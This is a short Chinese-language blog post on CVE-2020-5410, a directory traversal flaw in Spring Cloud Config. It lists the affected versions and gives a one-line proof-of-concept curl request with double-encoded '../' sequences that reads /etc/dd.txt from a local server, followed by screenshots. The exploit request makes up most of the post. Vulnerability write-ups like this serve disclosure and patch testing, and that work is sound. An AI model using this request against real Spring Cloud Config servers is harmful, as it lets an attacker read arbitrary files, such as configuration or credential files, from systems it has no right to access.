CVE-2020-5410 Spring Cloud Config 目录穿越

# CVE-2020-5410 Spring Cloud Config 目录穿越

影响版本:
– 2.2.0 to 2.2.2
– 2.1.0 to 2.1.8

poc:
“`java
curl http://127.0.0.1:8888/..%252F..%252Fetc%252Fdd.txt%23/CESHI
“`
读取/etc/dd.txt文件

![1.png](/media/editor/1_20210720222444284648.png)

![linux_b.png](/media/editor/linux_b_20210720222452221429.png)

![linux_file.png](/media/editor/linux_file_20210720222456382027.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容